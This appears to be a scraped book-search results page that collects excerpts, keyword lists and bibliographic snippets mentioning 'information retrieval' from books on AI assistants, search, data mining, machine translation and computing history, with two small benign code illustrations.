., 68 Hollingshead, John, 68 Holocaust survivors, 272–74 holograms, 273 Holtzman, Ari, 163–64 HomePod, 218, 225, 280 homonyms, 112 homophones, 97 Horsley, Scott, 214–15 Houdin, Jean-Eugène Robert, 19 Houston, Farah, 133, 134 Huffman, Scott, 49 human brain, 86–87 Hunt, Troy, 230 I IBM, 3, 71, 97, 108, 205 ICT (Institute for Creative Technologies), 244–46, 272–74 ImageNet Large-Scale Visual Recognition Challenge, 93–94 image recognition, 87–88, 90, 91–94, 103 immortality, virtual. See virtual immortality information retrieval (IR), 103–4, 146, 149–50, 160 InspiroBot, 108 Institute for Creative Technologies (ICT), 244–46, 272–74 intents, 257, 262 interactive voice response (IVR), 127 Internet of Things, 21–22 internet search technology, 3, 26, 54, 199–200, 203, 212, 278. See also question answering Invoke, 281 iPhone Evi app on, 203–4 sales of, 45 Siri and, 8, 17–18, 37, 47, 50, 212, 225 speech recognition and, 95 unveiling of, 7, 25 voice search app, 48 IR (information retrieval), 103–4, 146, 149–50, 160 Iris, 29 Irson, Thomas, 65 Isbitski, David, xvi Ishiguro, Hiroshi, 190–91 Ivona, 41–42 IVR (interactive voice response), 127 J Jack in the Box, 46 Jackson, Samuel L., 46 Jacob, Oren, 134, 171–73, 196, 253 Jarvis, 51 Jobs, Steve, 7, 34–37, 47, 48, 172 journalism, AI, 214–16 Julia (chatbot), 80–84, 98 Julia, Luc, 47 K Kahn, Peter, 192, 244 Karim (therapist chatbot), 246 Kasisto, 132 Kay, Tim, ix–x, xii–xiii, 13 Kelly, John, 110 Kempelen, Wolfgang von, 65–67, 69 Kim Jong Un, 217 Kindle, 41 Kismet (robot), 191–92 Kittlaus, Dag, 23–29, 32–37, 46–47, 55, 279 Kleber, Sophie, 278 Klein, Stephen, xiii knowledge, control of, 220 knowledge-based AI, 76–78, 84, 159, 161–63 Knowledge Graph, 204, 206, 212 knowledge graphs, 201–2, 204–5, 213 Knowledge Navigator, 16–18, 27 Krizhevsky, Alex, 93, 94 Kunze, Lauren, 256 Kurzweil, Fredric, 274–76 Kurzweil, Ray, 274–76, 277 Kuyda, Eugenia, 186–88, 196 Kuznetsov, Phillip, 261 Kylie.ai, 107 L L2, 209 language and human species, 4, 285–86 
language models for ASR, 96–97 Lasseter, John, 172 Lawson, Lindsey, 169, 182 Le, Quoc, 93, 97, 105–6, 254 LeCun, Yann, 89, 91–92, 93–94, 161 Lemon, Oliver, 145–46, 148, 158, 159 Lenat, Doug, 161, 162 Levitan, Peter, ix, xi, xii–xiii Levy, Steven, 79 Lewis, Thor, 138 Lieberman, Philip, 14 LifePod, 239 Lindbeck, Erica, 179–80 Lindsay, Al, 41, 44 linguistics, 127 linguistics, computational, 72 lip reading, 98 Loebner Prize competition, 82–84, 142, 160, 285 long short-term memory (LSTM), 106 Loup Ventures, 213 Love, Rachel, 271 LSTM (long short-term memory), 106 Luka, 186–87 Lycos, 79 Lyrebird, 114–15, 217 M M (virtual assistant), 51–52 machine learning.

One of the core principles for Germick and his colleagues is that the Assistant speaks like a human but doesn’t pretend to be one. “It’d be oddly disingenuous,” Germick says, “if we took you down the path of ‘My name is Marty. I’m a twenty-seven-year-old windsurfing enthusiast from Santa Barbara, California.’ We wanted to stop shy of that.” But Google wanted to flesh out the Assistant character at least somewhat. “We weren’t just thinking of voice as an information-retrieval system,” Germick says, “but also as a character that you want to spend time with and recognize the humanity of, in a sense.” So Google decided that the Assistant should be like a “hipster librarian,” knowledgeable, helpful, and quirky. It would be nonconfrontational and subservient to the user, a facilitator rather than a leader. “If we are the Beatles, we are probably Ringo,” Germick says.


pages: 205 words: 20,452

Data Mining in Time Series Databases by Mark Last, Abraham Kandel, Horst Bunke

call centre, computer vision, discrete time, G4S, information retrieval, iterative process, NP-complete, p-value, pattern recognition, random walk, sensor fusion, speech recognition, web application

., Sawhney, H.S., and Shim, K. (1995). Fast Similarity Search in the Presence of Noise, Scaling, and Translation in Time-Series Database. Proc. 21st Int. Conf. on Very Large Databases (VLDB), pp. 490–501. 3. Baeza-Yates, R. and Gonnet, G.H. (1999). A Fast Algorithm on Average for All-Against-All Sequence Matching. Proc. 6th String Processing and Information Retrieval Symposium (SPIRE), pp. 16–23. 4. Baeza-Yates, R. and Ribeiro-Neto, B. (1999). Modern Information Retrieval. ACM Press/Addison–Wesley Longman Limited. 5. Chakrabarti, K. and Mehrotra, S. (1999). The Hybrid Tree: An Index Structure for High Dimensional Feature Spaces. Proc. 15th Int. Conf. on Data Engineering (ICDE), pp. 440–447. 6. Chan, K. and Fu, A.W. (1999). Efficient Time Series Matching by Wavelets. Proc. 15th Int. Conf. on Data Engineering (ICDE), pp. 126–133. 7.

An Enhanced Representation of Time Series which Allows Fast and Accurate Classification, Clustering and Relevance Feedback. Proceedings of the 4th International Conference of Knowledge Discovery and Data Mining, AAAI Press, pp. 239–241. 14. Keogh, E. and Pazzani, M. (1999). Relevance Feedback Retrieval of Time Series Data. Proceedings of the 22nd Annual International ACM-SIGIR Conference on Research and Development in Information Retrieval, pp. 183–190. 15. Keogh, E. and Smyth, P. (1997). A Probabilistic Approach to Fast Pattern Matching in Time Series Databases. Proceedings of the 3rd International Conference of Knowledge Discovery and Data Mining, pp. 24–20. 16. Last, M., Klein, Y., and Kandel, A. (2001). Knowledge Discovery in Time Series Databases. IEEE Transactions on Systems, Man, and Cybernetics, 31B(1), 160–169. 17.

In many of these applications, searching through large, unstructured databases based on sample sequences is often desirable. Such similarity-based retrieval has attracted a great deal of attention in recent years. Although several different approaches have appeared, most are based on the common premise of dimensionality reduction and spatial access methods. This chapter gives an overview of recent research and shows how the methods fit into a general context of signature extraction. Keywords: Information retrieval; sequence databases; similarity search; spatial indexing; time sequences. 1. Introduction Time sequences arise in many applications—any applications that involve storing sensor inputs, or sampling a value that changes over time. A problem which has received an increasing amount of attention lately is the problem of similarity retrieval in databases of time sequences, so-called “query by example.”
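One common instance of the signature-extraction scheme the chapter surveys is piecewise aggregate approximation: each sequence is reduced to a short vector of segment means, and query-by-example then compares signatures rather than raw sequences. A minimal sketch, with our own function names:

```python
def paa(seq, k):
    """Signature extraction: reduce a sequence to k segment means."""
    n = len(seq)
    sig = []
    for i in range(k):
        seg = seq[i * n // k:(i + 1) * n // k]
        sig.append(sum(seg) / len(seg))
    return sig

def euclidean(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b)) ** 0.5

def query_by_example(database, query, k=4):
    """Return the stored sequence whose signature is nearest the query's."""
    qsig = paa(query, k)
    return min(database, key=lambda s: euclidean(paa(s, k), qsig))

db = [[0, 0, 1, 1, 0, 0, 1, 1],
      [1, 2, 3, 4, 5, 6, 7, 8]]
print(query_by_example(db, [1, 2, 3, 4, 5, 6, 7, 9]))
```

In the methods the chapter describes, the distance between signatures lower-bounds the true distance, which is what lets a spatial index over the low-dimensional signatures prune candidates without false dismissals.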


Designing Search: UX Strategies for Ecommerce Success by Greg Nudelman, Pabini Gabriel-Petit

access to a mobile phone, Albert Einstein, AltaVista, augmented reality, barriers to entry, business intelligence, call centre, crowdsourcing, information retrieval, Internet of things, performance metric, QR code, recommendation engine, RFID, search engine result page, semantic web, Silicon Valley, social graph, social web, speech recognition, text mining, the map is not the territory, The Wisdom of Crowds, web application, zero-sum game, Zipcar

“Reification and Affordances in a User Interface for Interacting with Heterogeneous Distributed Applications.” PhD thesis, Stanford University, May 1997. [Ellis, 1989] D. Ellis. A behavioural model for information retrieval system design. Journal of Information Science, 15: pp. 237–247, 1989. [Bates, 1979] M.J. Bates. Information search tactics. Journal of the American Society for Information Science, 30(4): pp. 205–214, 1979. [Norman, 1988] D.A. Norman. The Psychology of Everyday Things. Basic Books, New York, 1988. [Pirolli and Card, 1999] P. Pirolli and S.K. Card. Information foraging. Psychological Review, 106(4):pp. 643–675, 1999. [Belkin et al., 1993] N. Belkin, P. G. Marchetti, and C. Cool. Braque – design of an interface to support user interaction in information retrieval. Information Processing and Management, 29(3): pp. 325–344, 1993. [Chang and Rice, 1993] Shan-Ju Chang and Ronald E.

More recently, he has written and presented on “The Rhythm of Interaction,” urging colleagues to design pacing and tempo into what are increasingly dynamic and cinematic user experiences. He holds a degree in music theory and composition from Harvard. Daniel Tunkelang is a leading industry advocate of human-computer information retrieval (HCIR). He was a founding employee of faceted search pioneer Endeca, where he spent ten years as Chief Scientist. During that time, he established the HCIR workshop, which has taken place annually since 2007. Always working to bring together industry and academia, he co-organized the 2010 Workshop on Search and Social Media and has served as an organizer for the industry tracks of the premier conferences on information retrieval: SIGIR and CIKM. He authored a popular book on faceted search as part of the Morgan & Claypool Synthesis Lectures. In November 2009, he moved to Google, where he works on local search quality.

The strength of using a tabs-based sorting mechanism as the App Store’s primary navigation is the ability to offer inventory in a format that is optimized for a specific entry point, thus forming a series of parallel views of their inventory. These tabs-based sorting controls are extremely usable and intuitive, and readily contribute to a customer’s success. Figure 10-3: The iPhone App Store’s sort-by controls facilitate browsing Myth #4: Sorting and Filtering Cannot Be Combined in One Control As the amount of information retrieved increases, sorting search results becomes less and less about reordering the results and more about providing a convenient way to massage the results into a manageable form that more closely matches the person’s goals. This is especially important for user interfaces with limited screen real estate—like those on the mobile platforms. However, even on the Web, the demarcation between filtering and sorting is not necessarily a rigid one.


pages: 252 words: 74,167

Thinking Machines: The Inside Story of Artificial Intelligence and Our Race to Build the Future by Luke Dormehl

Ada Lovelace, agricultural Revolution, AI winter, Albert Einstein, Alexey Pajitnov wrote Tetris, algorithmic trading, Amazon Mechanical Turk, Apple II, artificial general intelligence, Automated Insights, autonomous vehicles, book scanning, borderless world, call centre, cellular automata, Claude Shannon: information theory, cloud computing, computer vision, correlation does not imply causation, crowdsourcing, drone strike, Elon Musk, Flash crash, friendly AI, game design, global village, Google X / Alphabet X, hive mind, industrial robot, information retrieval, Internet of things, iterative process, Jaron Lanier, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, Kickstarter, Kodak vs Instagram, Law of Accelerating Returns, life extension, Loebner Prize, Marc Andreessen, Mark Zuckerberg, Menlo Park, natural language processing, Norbert Wiener, out of africa, PageRank, pattern recognition, Ray Kurzweil, recommendation engine, remote working, RFID, self-driving car, Silicon Valley, Skype, smart cities, Smart Cities: Big Data, Civic Hackers, and the Quest for a New Utopia, social intelligence, speech recognition, Stephen Hawking, Steve Jobs, Steve Wozniak, Steven Pinker, strong AI, superintelligent machines, technological singularity, The Coming Technological Singularity, The Future of Employment, Tim Cook: Apple, too big to fail, Turing machine, Turing test, Vernor Vinge, Watson beat the top human players on Jeopardy!

Reachable only via a specially installed hydraulic lift, the egg welcomed in excited Fair attendees so that they could sit in a high-tech screening room and watch a video on the future of Artificial Intelligence. ‘See it, THINK, and marvel at the mind of man and his machine,’ wrote one giddy reviewer, borrowing the ‘Think’ tagline that had been IBM’s since the 1920s. IBM showed off several impressive technologies at the event. One was a groundbreaking handwriting recognition computer, which the official fair brochure referred to as an ‘Optical Scanning and Information Retrieval’ system. This demo allowed visitors to write an historical date of their choosing (post-1851) in their own handwriting on a small card. That card was then fed into an ‘optical character reader’ where it was converted into digital form, and then relayed once more to a state-of-the-art IBM 1460 computer system. Major news events were stored on disk in a vast database and the results were then printed onto a commemorative punch-card for the amazement of the user.

Perhaps borrowing a bit of Kennedy-style gauntlet-throwing, he casually added his own timeline: ‘It would be surprising if it were not accomplished within the next decade.’ Simon’s prediction was hopelessly off, but as it turns out, the second thing that registers about the World’s Fair is that IBM wasn’t wrong. All three of the technologies that dropped jaws in 1964 are commonplace today – despite our continued insistence that AI is not yet here. The Optical Scanning and Information Retrieval system has become the Internet: granting us access to more information at a moment’s notice than we could possibly hope to absorb in a lifetime. While we still cannot see the future, we are making enormous advances in this capacity, thanks to the huge datasets generated by users that offer constant forecasts about the news stories, books or songs that are likely to be of interest to us. This predictive connectivity isn’t limited to what would traditionally be thought of as a computer, either, but is embedded in the devices, vehicles and buildings around us thanks to a plethora of smart sensors and devices.

Another, called ANALOGY, did the same for the geometric questions found in IQ tests, while STUDENT cracked complex algebra story conundrums such as: ‘If the number of customers Tom gets is twice the square of 20 per cent of the number of advertisements he runs, and the number of advertisements he runs is 45, what is the number of customers Tom gets?’ A particularly impressive display of computational reasoning was a program called SIR (standing for Semantic Information Retrieval). SIR appeared to understand English sentences and was even able to learn relationships between objects in a way that resembled real intelligence. In reality, this ‘knowledge’ relied on a series of pre-programmed templates, such as A is a part of B, with nouns substituting for the variables. However, it was enough to suggest to the likes of Marvin Minsky that similar approaches could begin to tackle a variety of problems.
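The template mechanism the passage describes can be illustrated with a toy reconstruction (our own code, not SIR’s): each pattern pairs a sentence shape like ‘A is a part of B’ with a relation, and matched nouns fill the variables.

```python
import re

# Toy patterns in the spirit of SIR's pre-programmed templates.
PATTERNS = [
    (re.compile(r"^(\w+) is a part of (\w+)$"), "part-of"),
    (re.compile(r"^(\w+) is a (\w+)$"), "is-a"),
]

facts = set()

def learn(sentence):
    """Record a relation if the sentence matches a known template."""
    for pattern, relation in PATTERNS:
        m = pattern.match(sentence)
        if m:
            facts.add((relation, m.group(1), m.group(2)))
            return True
    return False

learn("nose is a part of face")
learn("rover is a dog")
print(sorted(facts))
```

Anything outside the pre-programmed shapes simply fails to match, which is why the apparent ‘understanding’ was so brittle.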


pages: 1,535 words: 337,071

Networks, Crowds, and Markets: Reasoning About a Highly Connected World by David Easley, Jon Kleinberg

Albert Einstein, AltaVista, clean water, conceptual framework, Daniel Kahneman / Amos Tversky, Douglas Hofstadter, Erdős number, experimental subject, first-price auction, fudge factor, George Akerlof, Gerard Salton, Gödel, Escher, Bach, incomplete markets, information asymmetry, information retrieval, John Nash: game theory, Kenneth Arrow, longitudinal study, market clearing, market microstructure, moral hazard, Nash equilibrium, Network effects, Pareto efficiency, Paul Erdős, planetary scale, prediction markets, price anchoring, price mechanism, prisoner's dilemma, random walk, recommendation engine, Richard Thaler, Ronald Coase, sealed-bid auction, search engine result page, second-price auction, second-price sealed-bid, Simon Singh, slashdot, social web, Steve Jobs, stochastic process, Ted Nelson, The Market for Lemons, The Wisdom of Crowds, trade route, transaction costs, ultimatum game, Vannevar Bush, Vickrey auction, Vilfredo Pareto, Yogi Berra, zero-sum game

Before discussing some of the ideas behind the ranking of pages, let’s begin by considering some of the basic reasons why it’s a hard problem. First, search is a hard problem for computers to solve in any setting, not just on the Web. Indeed, the field of information retrieval [35, 354] has dealt with this problem for decades before the creation of the Web: automated information retrieval systems starting in the 1960s were designed to search repositories of newspaper articles, scientific papers, patents, legal abstracts, and other document collections in response to keyword queries. Information retrieval systems have always had to deal with the problem that keywords are a very limited way to express a complex information need; in addition to the fact that a list of keywords is short and inexpressive, it suffers from the problems of synonymy (multiple ways to say the same thing, so that your search for recipes involving scallions fails because the recipe you wanted called them “green onions”) and polysemy (multiple meanings for the same term, so that your search for information about the animal called a jaguar instead produces results primarily about automobiles, football players, and an operating system for the Apple Macintosh).

With this in mind, people who depended on the success of their Web sites increasingly began modifying their Web-page authoring styles to score highly in search engine rankings. For people who had conceived of Web search as a kind of classical information retrieval application, this was something novel. Back in the 1970s and 1980s, when people designed information retrieval tools for scientific papers or newspaper articles, authors were not overtly writing their papers or abstracts with these search tools in mind. From the relatively early days of the Web, however, people have written Web pages with search engines quite explicitly in mind. At first, this was often done using over-the-top tricks that aroused the ire of the search industry; as the digital librarian Cliff Lynch noted at the time, “Web search is a new kind of information retrieval application in that the documents are actively behaving badly.” Over time though, the use of focused techniques to improve a page’s performance in search engine rankings became regularized and accepted, and guidelines for designing these techniques emerged; a fairly large industry known as search engine optimization (SEO) came into being, consisting of search experts who advise companies on how to create pages and sites that rank highly.

For a long time, up through the 1980s, information retrieval was the province of reference librarians, patent attorneys, and other people whose jobs consisted of searching collections of documents; such people were trained in how to formulate effective queries, and the documents they were searching tended to be written by professionals, using a controlled style and vocabulary. With the arrival of the Web, where everyone is an author and everyone is a searcher, the problems surrounding information retrieval exploded in scale and complexity. To begin with, the diversity in authoring styles makes it much harder to rank documents according to a common criterion: on a single topic, one can easily find pages written by experts, novices, children, conspiracy theorists — and not necessarily be able to tell which is which.


Cataloging the World: Paul Otlet and the Birth of the Information Age by Alex Wright

1960s counterculture, Ada Lovelace, barriers to entry, British Empire, business climate, business intelligence, Cape to Cairo, card file, centralized clearinghouse, corporate governance, crowdsourcing, Danny Hillis, Deng Xiaoping, don't be evil, Douglas Engelbart, Electric Kool-Aid Acid Test, European colonialism, Frederick Winslow Taylor, hive mind, Howard Rheingold, index card, information retrieval, invention of movable type, invention of the printing press, Jane Jacobs, John Markoff, Kevin Kelly, knowledge worker, Law of Accelerating Returns, linked data, Livingstone, I presume, lone genius, Menlo Park, Mother of all demos, Norman Mailer, out of africa, packet switching, profit motive, RAND corporation, Ray Kurzweil, Scramble for Africa, self-driving car, semantic web, Silicon Valley, speech recognition, Steve Jobs, Stewart Brand, Ted Nelson, The Death and Life of Great American Cities, the scientific method, Thomas L Friedman, urban planning, Vannevar Bush, Whole Earth Catalog

In 1780, an Austrian named Gerhard van Swieten further adapted the technique to create a master catalog for the Austrian National Library, known as the Josephinian Catalog (named for Austria’s “enlightened despot” Joseph II). Van Swieten decided to store his catalog cards in 205 wooden boxes, sealed in an airtight locker—the first recognizable precursor to the once familiar, now rapidly disappearing, library card catalog.23 Today, we might tend to think of the card catalog as a simplistic information retrieval tool: the dominion of somber librarians in fusty reading rooms. However, to take such a dismissive view of these compact, efficient systems—the direct ancestors of the modern database—may lead us to overlook the critical role they played in the industrial information explosion that would reshape the European world in the nineteenth century. In 1832, William Strange published the first volume of his Penny StoryTeller, a forty-six-page chapbook printed on cheap paper whose table of contents listed such fare as “The Cure of Consumption,” “House and Household,” and “Conscience Makes Cowards.”

Bryce—who had worked closely with Herman Hollerith on some of the company’s earliest punch-card technology11—promptly snapped up the rights (Goldberg had transferred the patent to his employer for the grand sum of $2.00). In the mid-1930s, IBM was building its portfolio of electronic devices (even before it had started manufacturing any of them), long before Vannevar Bush, then dean of engineering at the Massachusetts Institute of Technology, published his famous essay “As We May Think.” Today, most computer science historians have characterized Bush’s Rapid Selector as the first electronic information-retrieval machine. When Bush tried to patent his invention in 1937 and 1940, however, the U.S. Patent Office turned him down, citing Goldberg’s work. And while there is no evidence that Goldberg’s invention directly influenced Bush’s work, Donker Duyvis—Paul Otlet’s eventual successor at the IIB—did tell Bush about Goldberg’s invention in 1946.12 Despite his considerable achievements, Goldberg remains all but unknown today.

Only when the conflict between nation-states had been eliminated could humanity finally realize its spiritual and intellectual potential. Worldwide dissemination of recorded knowledge was an essential step along that path. Like Otlet, Wells believed that better access to information might help prevent future wars. Beginning with his 1905 work, A Modern Utopia, Wells had developed a fascination with the problem of information retrieval— the need for better methods for organizing the world’s recorded knowledge. This led him to reject old values and institutional strictures and embrace a mechanistic approach, one founded on Taylorist ideals of scientific management and a belief in the power of science to solve humanity’s problems, and the coming war in particular. The political and economic imbalances that were leading to war resembled diseases attacking a body beset by a compromised nervous system.


pages: 174 words: 56,405

Machine Translation by Thierry Poibeau

AltaVista, augmented reality, call centre, Claude Shannon: information theory, cloud computing, combinatorial explosion, crowdsourcing, easy for humans, difficult for computers, en.wikipedia.org, Google Glasses, information retrieval, Internet of things, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, natural language processing, Necker cube, Norbert Wiener, RAND corporation, Robert Mercer, Skype, speech recognition, statistical model, technological singularity, Turing test, wikimedia commons

Speech translation has become a hot topic (“speech to speech” applications aim at making it possible to speak in one’s own language with another interlocutor speaking in a foreign language by using live automated translation). The machine translation market is growing fast. Over the last few years we have witnessed the emergence of new applications, particularly on mobile devices. Cross-Language Information Retrieval Cross-language information retrieval aims to give access to documents initially written in different languages. Consider research on patents: when a company seeks to know if an idea or a process has already been patented, it must ensure that its research is exhaustive and covers all parts of the world. It is therefore fundamental to cross the language barrier, for both the query (i.e., the information need expressed through keywords) and the analysis of the responses (i.e., documents relevant to the information need).

See Evaluation measure and test Computational linguistics, 15, 36, 37, 68, 82–84 Computation time, 54, 149, 155, 170, Computer documentation, 119 Confidential data 230–231. See also Intelligence services Connected objects. See Smart glasses; Smart watch Construction (linguistic), 23 Context (linguistic), 17–21, 31, 34, 54–56, 64–67, 71, 92, 117–119, 129, 150, 176–178, 186, 188, 215–216, 238 Continuous model, 186–187 Conversational agent, 2. See also Artificial dialogue Coordination, 175 Corpus alignment, 91–108 Cross-language information retrieval, 238–239 Cryptography, 49, 52, 56, 58–60 Cryptology. See Cryptography CSLi, 232, 236 Cultural hegemony, 168, 250–251 Czech, 210, 213 DARPA, 200–203, 209, 259 Database access, 241 Date expressions, 115, 152, 160 Deceptive cognate, 11, 261 Decoder, 141, 144, 185, 186, 190 Deep learning, 34–35, 37, 170, 181–195, 228, 234, 247, 253–255 Deepmind, 182 Defense industry, 77, 88, 173, 232–233, 235 De Firmas-Périés, Arman-Charles-Daniel, 41 De Maimieux, Joseph, 41 Descartes, René, 40–42 Determiner, 133, 215 Dialogue.

See Professional translator Hungarian, 212, 213 Hutchins, John, 41, 44, 75, 81–82, 84, 229, 267–270 Hybrid system machine translation, 165, 170, 171–172, 218, 234 IBM, 36, 61, 68, 74, 126–145, 185, 197, 199, 200, 209, 212, 228, 232 IBM WebSphere. See Machine translation systems Ideographic writing system, 105 Idiom. See Idiomatic expression Idiomatic expression, 10, 11, 15, 23, 28, 30, 33, 115, 125, 178, 217, 219, 262 Iida, Hitoshi, 117 Image recognition, 183 Indirect machine translation, 25–32 Indo-European languages, 165, 213, 214, 250 Information retrieval, 45, 92, 238–239 Informativeness, 201, 206 Intelligence industry. See Intelligence services Intelligence services, 77, 89, 173, 225, 233, 235, 249 Interception (of communications), 225, 232 Interlingua, 24, 28–32, 40, 58, 63, 66–68, 85, 262 Interlingual machine translation. See Interlingua Intermediate representation, 25–32, 63 Internet, 33, 93, 97, 98, 100, 102, 164, 166, 168–169, 172, 197, 227–233, 238, 242–243, 247–250 link, 98–99 Interpretation, 20, 201 Island of confidence, 102, 108, 150 Isolating language, 215–216 Israel, 60, 69 Japan, 44, 67, 86, 87, 109 Japanese, 11, 88, 117–118, 164–165, 192, 242 Jibbigo, 236 JRC-Acquis corpus, 97, 212–213, 223 Keyword, 92, 99, 238 Kilgarriff, Adam, 18 King, Gilbert, 76 Kircher, Athanasius, 41 Koehn, Philip, 136, 212–213 Korean, 88, 235–236 Language complexity (see Complexity) diversity, 1, 164–170 (see also typology) exposure (see Child language acquisition) family, 30, 106, 138, 172–174 independent representation (see Interlingua) learning (see Child language acquisition) model, 127, 140, 142, 144, 153, 185 proximity, 163 (see also family) typology, 138, 192 (see also family) universal, 56, 66, 67 (see also Universal language) Lavie, Alon, 206 Learning step (or learning phase).


pages: 394 words: 108,215

What the Dormouse Said: How the Sixties Counterculture Shaped the Personal Computer Industry by John Markoff

Any sufficiently advanced technology is indistinguishable from magic, Apple II, back-to-the-land, beat the dealer, Bill Duvall, Bill Gates: Altair 8800, Buckminster Fuller, California gold rush, card file, computer age, computer vision, conceptual framework, cuban missile crisis, different worldview, Donald Knuth, Douglas Engelbart, Dynabook, Edward Thorp, El Camino Real, Electric Kool-Aid Acid Test, general-purpose programming language, Golden Gate Park, Hacker Ethic, hypertext link, informal economy, information retrieval, invention of the printing press, Jeff Rulifson, John Markoff, John Nash: game theory, John von Neumann, Kevin Kelly, knowledge worker, Mahatma Gandhi, Menlo Park, Mother of all demos, Norbert Wiener, packet switching, Paul Terrell, popular electronics, QWERTY keyboard, RAND corporation, RFC: Request For Comment, Richard Stallman, Robert X Cringely, Sand Hill Road, Silicon Valley, Silicon Valley startup, South of Market, San Francisco, speech recognition, Steve Crocker, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, Ted Nelson, The Hackers Conference, Thorstein Veblen, Turing test, union organizing, Vannevar Bush, Whole Earth Catalog, William Shockley: the traitorous eight

But the AI researchers translated his ideas into their own, and the concept of Augmentation seemed pallid when viewed through their eyes, reduced to the more mundane idea of information retrieval, missing Engelbart’s dream entirely.4 Gradually, he began to understand that the AI community was actually his philosophical enemy. After all, their vision was to replace humans with machines, while he wanted to extend and empower people. Engelbart would later say that he had nothing against the vision of AI but just believed that it would be decades and decades before it could be realized. He thought his idea was the one that was more practical. He frequently ran up against a wall of intellectual prejudice, which continued to plague him throughout his career. In 1960, Engelbart presented a paper at the annual meeting of the American Documentation Institute, outlining how computer systems of the future might change the role of information-retrieval specialists.

In 1960, Engelbart presented a paper at the annual meeting of the American Documentation Institute, outlining how computer systems of the future might change the role of information-retrieval specialists. The idea didn’t sit at all well with his audience, which gave his paper a blasé reception. He also got into an argument with a researcher who asserted that Engelbart was proposing nothing that was any different from any of the other information-retrieval efforts that were already under way. It was a long and lonely two years. The state of the art of computer science was moving quickly toward mathematical algorithms, and the computer scientists looked down their noses at his work, belittling it as mere office automation and hence beneath their notice. Moreover, his support from the air force was slightly suspect as well. The Office of Scientific Research had a reputation for funding way-out ideas, or in some cases outright kooks. Engelbart’s research was in danger of being thrown in with the work of somebody who was studying the clustering behavior of gnats.

There was an abyss between the original work done by Engelbart’s group in the sixties and the motley crew of hobbyists that would create the personal-computer industry beginning in 1975. In their hunger to possess their own computers, the PC hobbyists would miss the crux of the original idea: communications as an integral part of the design. That was at the heart of the epiphanies that Engelbart had years earlier, which led to the realization of Vannevar Bush’s Memex information-retrieval system of the 1940s. During the period from the early 1960s until 1969, when most of the development of the NLS system was completed, Engelbart and his band of researchers remained in a comfortable bubble. They were largely Pentagon funded, but unlike many of the engineering and computing groups that surrounded them at SRI, they weren’t doing work that directly contributed to the Vietnam War.


pages: 893 words: 199,542

Structure and interpretation of computer programs by Harold Abelson, Gerald Jay Sussman, Julie Sussman

Andrew Wiles, conceptual framework, Donald Knuth, Douglas Hofstadter, Eratosthenes, Fermat's Last Theorem, Gödel, Escher, Bach, industrial robot, information retrieval, iterative process, Johannes Kepler, loose coupling, probability theory / Blaise Pascal / Pierre de Fermat, Richard Stallman, Turing machine

What is the order of growth in the number of steps required by list->tree to convert a list of n elements? Exercise 2.65. Use the results of exercises 2.63 and 2.64 to give θ(n) implementations of union-set and intersection-set for sets implemented as (balanced) binary trees.41 Sets and information retrieval We have examined options for using lists to represent sets and have seen how the choice of representation for a data object can have a large impact on the performance of the programs that use the data. Another reason for concentrating on sets is that the techniques discussed here appear again and again in applications involving information retrieval. Consider a data base containing a large number of individual records, such as the personnel files for a company or the transactions in an accounting system. A typical data-management system spends a large amount of time accessing or modifying the data in the records and therefore requires an efficient method for accessing records.
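The record-retrieval idea the passage describes — ordering a set of records by key so that lookups need not scan the whole collection — can be sketched as follows. This is a minimal Python illustration (SICP's own examples are in Scheme); the node layout and the sample records are invented for the example.

```python
# A record set stored as a binary search tree ordered by a numeric key.
# Each node is a tuple (record, left_subtree, right_subtree); lookup is
# O(log n) for a balanced tree, versus O(n) for an unordered list.

def make_node(record, left=None, right=None):
    return (record, left, right)

def lookup(key, tree):
    """Return the record with the given key, or None if absent."""
    if tree is None:
        return None
    record, left, right = tree
    if key == record["key"]:
        return record
    elif key < record["key"]:
        return lookup(key, left)
    else:
        return lookup(key, right)

# Hypothetical personnel records keyed by employee number.
tree = make_node(
    {"key": 50, "name": "Hacker, Alyssa P."},
    make_node({"key": 20, "name": "Fect, Cy D."}),
    make_node({"key": 80, "name": "Tweakit, Lem E."}),
)

print(lookup(20, tree)["name"])  # Fect, Cy D.
print(lookup(99, tree))          # None
```

Each comparison discards half of the remaining records, which is why the representation choice matters so much for a data-management system that spends most of its time accessing records.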

In particular, there will be an “eval” part that classifies expressions according to type and an “apply” part that implements the language's abstraction mechanism (procedures in the case of Lisp, and rules in the case of logic programming). Also, a central role is played in the implementation by a frame data structure, which determines the correspondence between symbols and their associated values. One additional interesting aspect of our query-language implementation is that we make substantial use of streams, which were introduced in chapter 3. 4.4.1 Deductive Information Retrieval Logic programming excels in providing interfaces to data bases for information retrieval. The query language we shall implement in this chapter is designed to be used in this way. In order to illustrate what the query system does, we will show how it can be used to manage the data base of personnel records for Microshaft, a thriving high-technology company in the Boston area. The language provides pattern-directed access to personnel information and can also take advantage of general rules in order to make logical deductions.

The resulting RSA algorithm has become a widely used technique for enhancing the security of electronic communications. Because of this and related developments, the study of prime numbers, once considered the epitome of a topic in “pure” mathematics to be studied only for its own sake, now turns out to have important practical applications to cryptography, electronic funds transfer, and information retrieval. 1.3 Formulating Abstractions with Higher-Order Procedures We have seen that procedures are, in effect, abstractions that describe compound operations on numbers independent of the particular numbers. For example, when we (define (cube x) (* x x x)) we are not talking about the cube of a particular number, but rather about a method for obtaining the cube of any number.


pages: 523 words: 143,139

Algorithms to Live By: The Computer Science of Human Decisions by Brian Christian, Tom Griffiths

4chan, Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, algorithmic trading, anthropic principle, asset allocation, autonomous vehicles, Bayesian statistics, Berlin Wall, Bill Duvall, bitcoin, Community Supported Agriculture, complexity theory, constrained optimization, cosmological principle, cryptocurrency, Danny Hillis, David Heinemeier Hansson, delayed gratification, dematerialisation, diversification, Donald Knuth, double helix, Elon Musk, fault tolerance, Fellow of the Royal Society, Firefox, first-price auction, Flash crash, Frederick Winslow Taylor, George Akerlof, global supply chain, Google Chrome, Henri Poincaré, information retrieval, Internet Archive, Jeff Bezos, Johannes Kepler, John Nash: game theory, John von Neumann, Kickstarter, knapsack problem, Lao Tzu, Leonard Kleinrock, linear programming, martingale, Nash equilibrium, natural language processing, NP-complete, P = NP, packet switching, Pierre-Simon Laplace, prediction markets, race to the bottom, RAND corporation, RFC: Request For Comment, Robert X Cringely, Sam Altman, sealed-bid auction, second-price auction, self-driving car, Silicon Valley, Skype, sorting algorithm, spectrum auction, Stanford marshmallow experiment, 